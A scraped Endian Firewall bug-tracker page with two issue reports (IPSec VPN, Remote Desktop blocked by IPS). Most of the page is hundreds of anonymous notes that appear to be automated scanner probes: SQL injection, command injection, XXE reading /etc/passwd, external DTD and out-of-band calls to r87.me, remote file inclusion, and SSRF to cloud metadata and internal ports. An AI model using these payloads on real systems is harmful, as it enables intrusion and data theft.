SYSTEM WARNING: 'date_default_timezone_get(): It is not safe to rely on the system's timezone settings. You are *required* to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected the timezone 'UTC' for now, but please set date.timezone to select your timezone.' in '/usr/share/mantis/www/core.php' line 264

MantisBT

View Issue Details
4576 [Endian Firewall] VPN - IPSec major unable to reproduce 2013-09-24 13:35 2017-08-26 00:33
jeevan  
 
urgent  
feedback 2.5  
open  
none    
none  
   
ip sec vpn for 3 sites
i need to connect with ipsec for 3 sites
1. Site-A
2. Site-B
3. Site-C

 i am able to connect site A and B but not able to connect Site A and C
Can u pls suggest
There are no notes attached to this issue.





View Issue Details
4578 [Endian Firewall] Intrusion Prevention major sometimes 2013-10-02 10:50 2017-05-16 22:35
mhLearn  
Anonymous  
high 2.5.2  
resolved 2.5  
fixed  
none    
none future  
   
Remote Desktop Connection Failed When "Allow With IPS"
Remote Desktop Connection, port 3389 and 3390 were Allow With IPS on outgoing traffic and working fine all the time from version 2.5.1, then upgraded to 2.5.2 last month.

After snort rule was auto updated on today afternoon, then it failed to work. Changed the rule to just Allow, then it able to get through.

On the firewall log, it showed "OUTGOINGFW:ALLOW:12",when ports were Allow With IPS, but connection were failed. But if changed to Allow, then showed "OUTGOINGFW:ACCEPT:12" and connection was successful.
Things were done to test,

1. Restart efw system
2. Save and restart the SNORT
3. Tried on different computers
4. Tried on different zones
IPS_error_tcp port 1433.jpg (29,593) 2013-10-03 02:12
https://bugs.endian.com/file_download.php?file_id=1062&type=bug
Notes
(0008546)
mhLearn   
2013-10-03 01:52   
Same case happened to port 1433 and 3306, from internal zones to RED. Need to disabled "Allow With IPS" or disabled Intrusion Prevention, only then it works fine again.
(0008556)
Anonymous   
2017-05-16 20:44   
3
(0008557)
Anonymous   
2017-05-16 20:44   
3
(0008558)
Anonymous   
2017-05-16 20:44   
3
(0008559)
Anonymous   
2017-05-16 20:44   
3
(0008560)
Anonymous   
2017-05-16 20:44   
3
(0008561)
Anonymous   
2017-05-16 20:44   
3
(0008562)
Anonymous   
2017-05-16 20:44   
3
(0008563)
Anonymous   
2017-05-16 20:44   
3
(0008564)
Anonymous   
2017-05-16 20:44   
3
(0008565)
Anonymous   
2017-05-16 20:44   
3
(0008566)
Anonymous   
2017-05-16 20:45   
3
(0008567)
Anonymous   
2017-05-16 20:45   
3
(0008568)
Anonymous   
2017-05-16 20:45   
3
(0008569)
Anonymous   
2017-05-16 20:45   
3
(0008570)
Anonymous   
2017-05-16 20:45   
3
(0008571)
Anonymous   
2017-05-16 20:45   
3
(0008572)
Anonymous   
2017-05-16 20:45   
3
(0008573)
Anonymous   
2017-05-16 20:45   
3
(0008574)
Anonymous   
2017-05-16 20:45   
3
(0008575)
Anonymous   
2017-05-16 20:45   
3
(0008576)
Anonymous   
2017-05-16 20:45   
3
(0008577)
Anonymous   
2017-05-16 20:45   
3
(0008578)
Anonymous   
2017-05-16 20:45   
3
(0008579)
Anonymous   
2017-05-16 20:45   
3
(0008580)
Anonymous   
2017-05-16 20:45   
3
(0008581)
Anonymous   
2017-05-16 20:45   
3
(0008582)
Anonymous   
2017-05-16 20:45   
3
(0008583)
Anonymous   
2017-05-16 20:45   
3
(0008584)
Anonymous   
2017-05-16 20:46   
3
(0008585)
Anonymous   
2017-05-16 20:46   
3
(0008586)
Anonymous   
2017-05-16 20:46   
3
(0008587)
Anonymous   
2017-05-16 20:46   
3
(0008588)
Anonymous   
2017-05-16 20:46   
3
(0008589)
Anonymous   
2017-05-16 20:46   
3
(0008590)
Anonymous   
2017-05-16 20:46   
3
(0008591)
Anonymous   
2017-05-16 20:46   
3
(0008592)
Anonymous   
2017-05-16 20:46   
3
(0008593)
Anonymous   
2017-05-16 20:46   
3
(0008594)
Anonymous   
2017-05-16 20:46   
3
(0008595)
Anonymous   
2017-05-16 20:46   
3
(0008596)
Anonymous   
2017-05-16 20:46   
3
(0008597)
Anonymous   
2017-05-16 20:46   
3
(0008598)
Anonymous   
2017-05-16 20:46   
3
(0008599)
Anonymous   
2017-05-16 20:46   
3
(0008600)
Anonymous   
2017-05-16 20:46   
3
(0008601)
Anonymous   
2017-05-16 20:46   
3
(0008602)
Anonymous   
2017-05-16 20:46   
3
(0008603)
Anonymous   
2017-05-16 20:46   
3
(0008604)
Anonymous   
2017-05-16 20:46   
3
(0008605)
Anonymous   
2017-05-16 20:46   
3
(0008606)
Anonymous   
2017-05-16 20:46   
3
(0008607)
Anonymous   
2017-05-16 20:46   
3
(0008608)
Anonymous   
2017-05-16 20:47   
3
(0008609)
Anonymous   
2017-05-16 20:47   
3
(0008610)
Anonymous   
2017-05-16 20:47   
3
(0008611)
Anonymous   
2017-05-16 20:47   
3
(0008612)
Anonymous   
2017-05-16 20:47   
3
(0008613)
Anonymous   
2017-05-16 20:47   
3
(0008614)
Anonymous   
2017-05-16 20:47   
3
(0008615)
Anonymous   
2017-05-16 20:47   
3
(0008616)
Anonymous   
2017-05-16 20:47   
3
(0008617)
Anonymous   
2017-05-16 20:47   
3
(0008618)
Anonymous   
2017-05-16 20:47   
3
(0008619)
Anonymous   
2017-05-16 20:47   
3
(0008620)
Anonymous   
2017-05-16 20:47   
3
(0008621)
Anonymous   
2017-05-16 20:47   
3
(0008622)
Anonymous   
2017-05-16 20:47   
3
(0008623)
Anonymous   
2017-05-16 20:47   
3
(0008624)
Anonymous   
2017-05-16 20:47   
3
(0008625)
Anonymous   
2017-05-16 20:47   
3
(0008626)
Anonymous   
2017-05-16 20:47   
3
(0008627)
Anonymous   
2017-05-16 20:47   
3
(0008628)
Anonymous   
2017-05-16 20:47   
3
(0008629)
Anonymous   
2017-05-16 20:47   
3
(0008630)
Anonymous   
2017-05-16 20:47   
3
(0008631)
Anonymous   
2017-05-16 20:47   
3
(0008632)
Anonymous   
2017-05-16 20:47   
3
(0008633)
Anonymous   
2017-05-16 20:47   
3
(0008634)
Anonymous   
2017-05-16 20:47   
3
(0008635)
Anonymous   
2017-05-16 20:47   
3
(0008636)
Anonymous   
2017-05-16 20:47   
3
(0008637)
Anonymous   
2017-05-16 20:47   
3
(0008638)
Anonymous   
2017-05-16 20:47   
3
(0008639)
Anonymous   
2017-05-16 20:48   
3
(0008640)
Anonymous   
2017-05-16 20:48   
3
(0008641)
Anonymous   
2017-05-16 20:48   
3
(0008642)
Anonymous   
2017-05-16 20:48   
3
(0008643)
Anonymous   
2017-05-16 20:48   
3
(0008644)
Anonymous   
2017-05-16 20:48   
3
(0008645)
Anonymous   
2017-05-16 20:48   
3
(0008646)
Anonymous   
2017-05-16 20:48   
3
(0008647)
Anonymous   
2017-05-16 20:48   
3
(0008648)
Anonymous   
2017-05-16 20:48   
3
(0008649)
Anonymous   
2017-05-16 20:48   
3
(0008650)
Anonymous   
2017-05-16 20:49   
3
(0008651)
Anonymous   
2017-05-16 20:49   
3
(0008652)
Anonymous   
2017-05-16 20:49   
3
(0008653)
Anonymous   
2017-05-16 20:49   
3
(0008654)
Anonymous   
2017-05-16 20:49   
3
(0008655)
Anonymous   
2017-05-16 20:49   
3
(0008656)
Anonymous   
2017-05-16 20:49   
3
(0008657)
Anonymous   
2017-05-16 20:50   
3
(0008658)
Anonymous   
2017-05-16 20:50   
3
(0008659)
Anonymous   
2017-05-16 20:50   
3
(0008660)
Anonymous   
2017-05-16 20:51   
3
(0008661)
Anonymous   
2017-05-16 20:51   
3
(0008662)
Anonymous   
2017-05-16 20:51   
3
(0008663)
Anonymous   
2017-05-16 20:51   
3
(0008664)
Anonymous   
2017-05-16 20:51   
3
(0008665)
Anonymous   
2017-05-16 20:52   
3
(0008666)
Anonymous   
2017-05-16 20:52   
3
(0008667)
Anonymous   
2017-05-16 20:52   
3
(0008668)
Anonymous   
2017-05-16 20:52   
3
(0008669)
Anonymous   
2017-05-16 20:52   
3
(0008670)
Anonymous   
2017-05-16 20:52   
3
(0008671)
Anonymous   
2017-05-16 20:52   
3
(0008672)
Anonymous   
2017-05-16 20:52   
3
(0008673)
Anonymous   
2017-05-16 20:53   
3
(0008674)
Anonymous   
2017-05-16 20:53   
3
(0008675)
Anonymous   
2017-05-16 20:53   
3
(0008676)
Anonymous   
2017-05-16 20:53   

ns:netsparker056650=vuln
(0008677)
Anonymous   
2017-05-16 20:53   
3
(0008678)
Anonymous   
2017-05-16 20:53   

ns:netsparker056650=vuln
(0008679)
Anonymous   
2017-05-16 20:53   
3
(0008680)
Anonymous   
2017-05-16 20:53   
http://example.com/? [^]
ns: netsparker056650=vuln
(0008681)
Anonymous   
2017-05-16 20:53   
3
(0008682)
Anonymous   
2017-05-16 20:53   
http://example.com/? [^]
ns: netsparker056650=vuln
(0008683)
Anonymous   
2017-05-16 20:53   
3
(0008684)
Anonymous   
2017-05-16 20:54   
ns:netsparker056650=vuln
(0008685)
Anonymous   
2017-05-16 20:54   
3
(0008686)
Anonymous   
2017-05-16 20:54   
ns:netsparker056650=vuln
(0008687)
Anonymous   
2017-05-16 20:54   
"&ping -c 25 127.0.0.1 &"
(0008688)
Anonymous   
2017-05-16 20:54   
3
(0008689)
Anonymous   
2017-05-16 20:54   

ns:netsparker056650=vuln
(0008690)
Anonymous   
2017-05-16 20:54   
"&ping -c 25 127.0.0.1 &"
(0008691)
Anonymous   
2017-05-16 20:54   

ns:netsparker056650=vuln
(0008692)
Anonymous   
2017-05-16 20:54   
'&ping -c 25 127.0.0.1 &'
(0008693)
Anonymous   
2017-05-16 20:54   
3
(0008694)
Anonymous   
2017-05-16 20:54   
'&ping -c 25 127.0.0.1 &'
(0008695)
Anonymous   
2017-05-16 20:54   
hTTp://r87.com/n [^]
(0008696)
Anonymous   
2017-05-16 20:54   
3
(0008697)
Anonymous   
2017-05-16 20:54   
&ping -c 25 127.0.0.1 &
(0008698)
Anonymous   
2017-05-16 20:54   
hTTp://r87.com/n [^]
(0008699)
Anonymous   
2017-05-16 20:55   
&ping -c 25 127.0.0.1 &
(0008700)
Anonymous   
2017-05-16 20:55   
http://r87.com/n? [^].php
(0008701)
Anonymous   
2017-05-16 20:55   
3
(0008702)
Anonymous   
2017-05-16 20:55   
ping -c 25 127.0.0.1 &
(0008703)
Anonymous   
2017-05-16 20:55   
http://r87.com/n? [^].php
(0008704)
Anonymous   
2017-05-16 20:55   
ping -c 25 127.0.0.1 &
(0008705)
Anonymous   
2017-05-16 20:55   
http://r87.com/n?.php [^]
(0008706)
Anonymous   
2017-05-16 20:55   
ping -c 25 127.0.0.1
(0008707)
Anonymous   
2017-05-16 20:55   
3
(0008708)
Anonymous   
2017-05-16 20:55   
http://r87.com/n?.php [^]
(0008709)
Anonymous   
2017-05-16 20:55   
ping -c 25 127.0.0.1
(0008710)
Anonymous   
2017-05-16 20:55   
php://filter//resource=http://r87.com/n? [^].php
(0008711)
Anonymous   
2017-05-16 20:55   
3
(0008712)
Anonymous   
2017-05-16 20:56   
php://filter//resource=http://r87.com/n? [^].php
(0008713)
Anonymous   
2017-05-16 20:56   
r87.com/n
(0008714)
Anonymous   
2017-05-16 20:56   
3
(0008715)
Anonymous   
2017-05-16 20:56   
3
(0008716)
Anonymous   
2017-05-16 20:56   
3
(0008717)
Anonymous   
2017-05-16 20:56   
r87.com/n
(0008718)
Anonymous   
2017-05-16 20:56   
3
(0008719)
Anonymous   
2017-05-16 20:56   
3
(0008720)
Anonymous   
2017-05-16 20:56   
3
(0008721)
Anonymous   
2017-05-16 20:57   
3
(0008722)
Anonymous   
2017-05-16 20:57   
3
(0008723)
Anonymous   
2017-05-16 20:57   
3
(0008724)
Anonymous   
2017-05-16 20:57   
3
(0008725)
Anonymous   
2017-05-16 20:57   
3
(0008726)
Anonymous   
2017-05-16 20:57   
3
(0008727)
Anonymous   
2017-05-16 20:57   
3
(0008728)
Anonymous   
2017-05-16 20:57   
3
(0008729)
Anonymous   
2017-05-16 20:57   
3
(0008730)
Anonymous   
2017-05-16 20:57   
3
(0008731)
Anonymous   
2017-05-16 20:57   
3
(0008732)
Anonymous   
2017-05-16 20:57   
3
(0008733)
Anonymous   
2017-05-16 20:57   
3
(0008734)
Anonymous   
2017-05-16 20:58   
3
(0008735)
Anonymous   
2017-05-16 20:58   
<?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///etc/passwd"> [^]]><ns>&lfi;</ns>
(0008736)
Anonymous   
2017-05-16 20:58   
"&expr 268409241 - 2 &"
(0008737)
Anonymous   
2017-05-16 20:58   
3
(0008738)
Anonymous   
2017-05-16 20:58   
<?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///etc/passwd"> [^]]><ns>&lfi;</ns>
(0008739)
Anonymous   
2017-05-16 20:58   
3
(0008740)
Anonymous   
2017-05-16 20:58   
"&expr 268409241 - 2 &"
(0008741)
Anonymous   
2017-05-16 20:58   
'&expr 268409241 - 2 &'
(0008742)
Anonymous   
2017-05-16 20:58   
3
(0008743)
Anonymous   
2017-05-16 20:58   
3
(0008744)
Anonymous   
2017-05-16 20:58   
3
(0008745)
Anonymous   
2017-05-16 20:58   
'&expr 268409241 - 2 &'
(0008746)
Anonymous   
2017-05-16 20:58   
&expr 268409241 - 2 &
(0008747)
Anonymous   
2017-05-16 20:58   
3
(0008748)
Anonymous   
2017-05-16 20:58   
3
(0008749)
Anonymous   
2017-05-16 20:59   
3
(0008750)
Anonymous   
2017-05-16 20:59   
&expr 268409241 - 2 &
(0008751)
Anonymous   
2017-05-16 20:59   
expr 268409241 - 2 &
(0008752)
Anonymous   
2017-05-16 20:59   
3
(0008753)
Anonymous   
2017-05-16 20:59   
3
(0008754)
Anonymous   
2017-05-16 20:59   
3
(0008755)
Anonymous   
2017-05-16 20:59   
expr 268409241 - 2 &
(0008756)
Anonymous   
2017-05-16 20:59   
expr 268409241 - 2
(0008757)
Anonymous   
2017-05-16 20:59   
3
(0008758)
Anonymous   
2017-05-16 20:59   
3
(0008759)
Anonymous   
2017-05-16 20:59   
expr 268409241 - 2
(0008760)
Anonymous   
2017-05-16 20:59   
3
(0008761)
Anonymous   
2017-05-16 20:59   
((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/
(0008762)
Anonymous   
2017-05-16 20:59   
<!--#exec cmd="expr 268409241 - 2"-->
(0008763)
Anonymous   
2017-05-16 21:00   
((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/
(0008764)
Anonymous   
2017-05-16 21:00   
3
(0008765)
Anonymous   
2017-05-16 21:00   
<!--#exec cmd="expr 268409241 - 2"-->
(0008766)
Anonymous   
2017-05-16 21:00   
3
(0008767)
Anonymous   
2017-05-16 21:00   
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1
(0008768)
Anonymous   
2017-05-16 21:00   
3
(0008769)
Anonymous   
2017-05-16 21:00   
|expr${IFS}268409241${IFS}-${IFS}2
(0008770)
Anonymous   
2017-05-16 21:00   
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1
(0008771)
Anonymous   
2017-05-16 21:00   
3
(0008772)
Anonymous   
2017-05-16 21:00   
|expr${IFS}268409241${IFS}-${IFS}2
(0008773)
Anonymous   
2017-05-16 21:00   
3
(0008774)
Anonymous   
2017-05-16 21:00   
((select sleep(25)))a-- 1
(0008775)
Anonymous   
2017-05-16 21:00   
3
(0008776)
Anonymous   
2017-05-16 21:01   
((select sleep(25)))a-- 1
(0008777)
Anonymous   
2017-05-16 21:01   
3
(0008778)
Anonymous   
2017-05-16 21:01   
3
(0008779)
Anonymous   
2017-05-16 21:01   
3
(0008780)
Anonymous   
2017-05-16 21:01   
((SELECT 1 FROM (SELECT SLEEP(25))A))
(0008781)
Anonymous   
2017-05-16 21:01   
3
(0008782)
Anonymous   
2017-05-16 21:01   
((SELECT 1 FROM (SELECT SLEEP(25))A))
(0008783)
Anonymous   
2017-05-16 21:01   
3
(0008784)
Anonymous   
2017-05-16 21:01   
3
(0008785)
Anonymous   
2017-05-16 21:01   
3
(0008786)
Anonymous   
2017-05-16 21:01   
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+'
(0008787)
Anonymous   
2017-05-16 21:01   
3
(0008788)
Anonymous   
2017-05-16 21:01   
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+'
(0008789)
Anonymous   
2017-05-16 21:01   
3
(0008790)
Anonymous   
2017-05-16 21:01   
3
(0008791)
Anonymous   
2017-05-16 21:01   
3
(0008792)
Anonymous   
2017-05-16 21:01   
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'
(0008793)
Anonymous   
2017-05-16 21:01   
3
(0008794)
Anonymous   
2017-05-16 21:02   
3
(0008795)
Anonymous   
2017-05-16 21:02   
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'
(0008796)
Anonymous   
2017-05-16 21:02   
3
(0008797)
Anonymous   
2017-05-16 21:02   
3
(0008798)
Anonymous   
2017-05-16 21:02   
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))
(0008799)
Anonymous   
2017-05-16 21:02   
3
(0008800)
Anonymous   
2017-05-16 21:02   
3
(0008801)
Anonymous   
2017-05-16 21:02   
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))
(0008802)
Anonymous   
2017-05-16 21:02   
3
(0008803)
Anonymous   
2017-05-16 21:02   
3
(0008804)
Anonymous   
2017-05-16 21:02   
3
(0008805)
Anonymous   
2017-05-16 21:02   
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"
(0008806)
Anonymous   
2017-05-16 21:02   
3
(0008807)
Anonymous   
2017-05-16 21:02   
3
(0008808)
Anonymous   
2017-05-16 21:02   
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"
(0008809)
Anonymous   
2017-05-16 21:02   
3
(0008810)
Anonymous   
2017-05-16 21:03   
3
(0008811)
Anonymous   
2017-05-16 21:03   
3
(0008812)
Anonymous   
2017-05-16 21:03   
3
(0008813)
Anonymous   
2017-05-16 21:03   
print(int)0xFFF9999-22
(0008814)
Anonymous   
2017-05-16 21:03   
3
(0008815)
Anonymous   
2017-05-16 21:03   
3
(0008816)
Anonymous   
2017-05-16 21:04   
print(int)0xFFF9999-22
(0008817)
Anonymous   
2017-05-16 21:04   
3
(0008818)
Anonymous   
2017-05-16 21:04   
3
(0008819)
Anonymous   
2017-05-16 21:04   
print(int)0xFFF9999-22;
(0008820)
Anonymous   
2017-05-16 21:04   
3
(0008821)
Anonymous   
2017-05-16 21:04   
3
(0008822)
Anonymous   
2017-05-16 21:05   
1 OR 1=1
(0008823)
Anonymous   
2017-05-16 21:05   
3
(0008824)
Anonymous   
2017-05-16 21:05   
+print(int)0xFFF9999-22;//
(0008825)
Anonymous   
2017-05-16 21:05   
3
(0008826)
Anonymous   
2017-05-16 21:05   
3
(0008827)
Anonymous   
2017-05-16 21:05   
3
(0008828)
Anonymous   
2017-05-16 21:05   
1 OR 1=1
(0008829)
Anonymous   
2017-05-16 21:05   
+print(int)0xFFF9999-22;//
(0008830)
Anonymous   
2017-05-16 21:05   
'
(0008831)
Anonymous   
2017-05-16 21:06   
3
(0008832)
Anonymous   
2017-05-16 21:06   
'+print(int)0xFFF9999-22+'
(0008833)
Anonymous   
2017-05-16 21:06   
3
(0008834)
Anonymous   
2017-05-16 21:06   
3
(0008835)
Anonymous   
2017-05-16 21:06   
3
(0008836)
Anonymous   
2017-05-16 21:06   
NS1NO
(0008837)
Anonymous   
2017-05-16 21:06   
'+print(int)0xFFF9999-22+'
(0008838)
Anonymous   
2017-05-16 21:06   
1 AND 'NS='ss
(0008839)
Anonymous   
2017-05-16 21:07   
3
(0008840)
Anonymous   
2017-05-16 21:07   
3
(0008841)
Anonymous   
2017-05-16 21:07   
"+print(int)0xFFF9999-22+"
(0008842)
Anonymous   
2017-05-16 21:07   
3
(0008843)
Anonymous   
2017-05-16 21:07   
1' OR 1=1 OR 'ns'='ns
(0008844)
Anonymous   
2017-05-16 21:07   
3
(0008845)
Anonymous   
2017-05-16 21:07   
8b_dpll63oo2bx2tznbc-g-gvlpquvpopr70pllseki.r87.me
(0008846)
Anonymous   
2017-05-16 21:07   
"+print(int)0xFFF9999-22+"
(0008847)
Anonymous   
2017-05-16 21:07   
1 OR 17-7=10
(0008848)
Anonymous   
2017-05-16 21:07   
3
(0008849)
Anonymous   
2017-05-16 21:07   
8b_dpll63ool2zdtoi1sjffs7xsb7tie3wr6mz2wms8.r87.me
(0008850)
Anonymous   
2017-05-16 21:07   
<? print(int)0xFFF9999-22;//?>
(0008851)
Anonymous   
2017-05-16 21:07   
1 OR X='ss
(0008852)
Anonymous   
2017-05-16 21:08   
3
(0008853)
Anonymous   
2017-05-16 21:08   
3
(0008854)
Anonymous   
2017-05-16 21:08   
<? print(int)0xFFF9999-22;//?>
(0008855)
Anonymous   
2017-05-16 21:08   
1' OR 1=1 OR '1'='1
(0008856)
Anonymous   
2017-05-16 21:08   
http://aws.r87.me/latest/meta-data/public-hostname [^]
(0008857)
Anonymous   
2017-05-16 21:08   
//8b_dpll63ompqmbbcnwlpwxwaqolevwswgm1v9y040c.r87.me
(0008858)
Anonymous   
2017-05-16 21:08   
3
(0008859)
Anonymous   
2017-05-16 21:08   
{php}print(int)0xFFF9999-22;{/php}
(0008860)
Anonymous   
2017-05-16 21:08   
1' OR 1=1 OR '1'='1
(0008861)
Anonymous   
2017-05-16 21:09   
http://aws.r87.me/latest/meta-data/public-hostname [^]
(0008862)
Anonymous   
2017-05-16 21:09   
http://r87.me/r/?id=8b_dpll63ofn8xya7pdigr5ij5jxqb0rn00_aj9yk8a [^]
(0008863)
Anonymous   
2017-05-16 21:09   
{php}print(int)0xFFF9999-22;{/php}
(0008864)
Anonymous   
2017-05-16 21:09   
1 OR 1=1
(0008865)
Anonymous   
2017-05-16 21:09   
http://169.254.169.254/latest/meta-data/public-hostname [^]
(0008866)
Anonymous   
2017-05-16 21:09   
http://r87.me/r/?id=8b_dpll63ook47qethsgb4hnl-hapchesziwmy11jww [^]
(0008867)
Anonymous   
2017-05-16 21:09   
3
(0008868)
Anonymous   
2017-05-16 21:09   
'{${print(int)0xFFF9999-22}}'
(0008869)
Anonymous   
2017-05-16 21:09   
1 OR 1=1
(0008870)
Anonymous   
2017-05-16 21:10   
http://169.254.169.254/latest/meta-data/public-hostname [^]
(0008871)
Anonymous   
2017-05-16 21:10   
%27
(0008872)
Anonymous   
2017-05-16 21:10   
'
(0008873)
Anonymous   
2017-05-16 21:10   
http://127.100.11.2:22 [^]
(0008874)
Anonymous   
2017-05-16 21:10   
3
(0008875)
Anonymous   
2017-05-16 21:10   
%27
(0008876)
Anonymous   
2017-05-16 21:11   
[php]print(int)0xFFF9999-22;[/php]
(0008877)
Anonymous   
2017-05-16 21:11   
NS1NO
(0008878)
Anonymous   
2017-05-16 21:11   
http://127.100.11.2:22 [^]
(0008879)
Anonymous   
2017-05-16 21:11   
-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
(0008880)
Anonymous   
2017-05-16 21:11   
[php]print(int)0xFFF9999-22;[/php]
(0008881)
Anonymous   
2017-05-16 21:11   
1 AND 'NS='ss
(0008882)
Anonymous   
2017-05-16 21:11   
3
(0008883)
Anonymous   
2017-05-16 21:11   
http://127.0.0.1:3306 [^]
(0008884)
Anonymous   
2017-05-16 21:11   
3
(0008885)
Anonymous   
2017-05-16 21:11   
-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
(0008886)
Anonymous   
2017-05-16 21:12   
1' OR 1=1 OR 'ns'='ns
(0008887)
Anonymous   
2017-05-16 21:12   
http://127.0.0.1:3306 [^]
(0008888)
Anonymous   
2017-05-16 21:12   
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
(0008889)
Anonymous   
2017-05-16 21:12   
3
(0008890)
Anonymous   
2017-05-16 21:12   
1 OR 17-7=10
(0008891)
Anonymous   
2017-05-16 21:12   
3
(0008892)
Anonymous   
2017-05-16 21:12   
3
(0008893)
Anonymous   
2017-05-16 21:12   
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
(0008894)
Anonymous   
2017-05-16 21:12   
1 OR X='ss
(0008895)
Anonymous   
2017-05-16 21:13   
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
(0008896)
Anonymous   
2017-05-16 21:13   
3
(0008897)
Anonymous   
2017-05-16 21:13   
1' OR 1=1 OR '1'='1
(0008898)
Anonymous   
2017-05-16 21:13   
3
(0008899)
Anonymous   
2017-05-16 21:13   
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
(0008900)
Anonymous   
2017-05-16 21:13   
1' OR 1=1 OR '1'='1
(0008901)
Anonymous   
2017-05-16 21:13   
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "http://8b_dpll6"><!ENTITY [^] % d "3ottrxo1akgvl_yvpi_eisack4x2qxt1rcc.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> [^] %dtd;]><r>&a;</r>
(0008902)
Anonymous   
2017-05-16 21:13   
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
(0008903)
Anonymous   
2017-05-16 21:14   
3
(0008904)
Anonymous   
2017-05-16 21:14   
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "http://8b_dpll6"><!ENTITY [^] % d "3ocjisqwac1c5qfe0dmgnbfv5ifimqjnfb4.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> [^] %dtd;]><r>&a;</r>
(0008905)
Anonymous   
2017-05-16 21:14   
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
(0008906)
Anonymous   
2017-05-16 21:14   
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "php://filter/resource=http://8b_dpll6"><!ENTITY [^] % d "3o0kzqdw8apiefskuj_nzk0qk_hhrbhq8zk.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> [^] %dtd;]><r>&a;</r>
(0008907)
Anonymous   
2017-05-16 21:14   
NSFTW
(0008908)
Anonymous   
2017-05-16 21:14   
3
(0008909)
Anonymous   
2017-05-16 21:15   
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "php://filter/resource=http://8b_dpll6"><!ENTITY [^] % d "3ouu4s0jnh-hpgwu2lbbob6nvplbzy3ltlk.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> [^] %dtd;]><r>&a;</r>
(0008910)
Anonymous   
2017-05-16 21:15   
NSFTW
(0008911)
Anonymous   
2017-05-16 21:15   
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "php://filter/read=convert.base64-encode/resource=http://8b_dpll6"><!ENTITY [^] % d "3ozrcjp_v4d3dnf0kam2hsg7f6gd-lrrhbw.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> [^] %dtd;]><r>&a;</r>
(0008912)
Anonymous   
2017-05-16 21:15   
'+NSFTW+'
(0008913)
Anonymous   
2017-05-16 21:15   
3
(0008914)
Anonymous   
2017-05-16 21:15   
